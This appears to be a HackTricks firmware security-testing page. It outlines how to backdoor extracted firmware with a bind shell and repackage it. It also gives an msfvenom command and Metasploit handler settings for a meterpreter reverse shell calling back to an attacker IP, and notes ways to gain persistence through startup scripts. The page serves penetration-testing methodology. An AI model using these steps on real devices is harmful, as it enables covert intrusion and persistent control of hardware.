5.3 KiB

Raw Blame History

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Firmware Integrity

This page was copied from https://scriptingxss.gitbook.io/firmware-security-testing-methodology/

Attempt to upload custom firmware and/or compiled binaries for integrity or signature verification flaws. For example, compile a backdoor bind shell that starts upon boot using the following steps.

Extract firmware with firmware-mod-kit (FMK)
Identify the target firmware architecture and endianness
Build a cross compiler with Buildroot or use other methods that suits your environment
Use cross compiler to build the backdoor
Copy the backdoor to extracted firmware /usr/bin
Copy appropriate QEMU binary to extracted firmware rootfs
Emulate the backdoor using chroot and QEMU
Connect to backdoor via netcat
Remove QEMU binary from extracted firmware rootfs
Repackage the modified firmware with FMK
Test backdoored firmware by emulating with firmware analysis toolkit (FAT) and connecting to the target backdoor IP and port using netcat

If a root shell has already been obtained from dynamic analysis, bootloader manipulation, or hardware security testing means, attempt to execute precompiled malicious binaries such as implants or reverse shells. Consider using automated payload/implant tools used for command and control (C&C) frameworks. For example, Metasploit framework and ‘msfvenom’ can be leveraged using the following steps.

Identify the target firmware architecture and endianness
Use msfvenom to specify the appropriate target payload (-p), attacker host IP (LHOST=), listening port number (LPORT=) filetype (-f), architecture (--arch), platform (--platform linux or windows), and the output file (-o). For example, msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
Transfer the payload to the compromised device (e.g. Run a local webserver and wget/curl the payload to the filesystem) and ensure the payload has execution permissions
Prepare Metasploit to handle incoming requests. For example, start Metasploit with msfconsole and use the following settings according to the payload above: use exploit/multi/handler,
- set payload linux/armle/meterpreter_reverse_tcp
- set LHOST 192.168.1.245 #attacker host IP
- set LPORT 445 #can be any unused port
- set ExitOnSession false
- exploit -j -z
Execute the meterpreter reverse 🐚 on the compromised device
Watch meterpreter sessions open
Perform post exploitation activities

If possible, identify a vulnerability within startup scripts to obtain persistent access to a device across reboots. Such vulnerabilities arise when startup scripts reference, symbolically link, or depend on code located in untrusted mounted locations such as SD cards, and flash volumes used for storage data outside of root filesystems.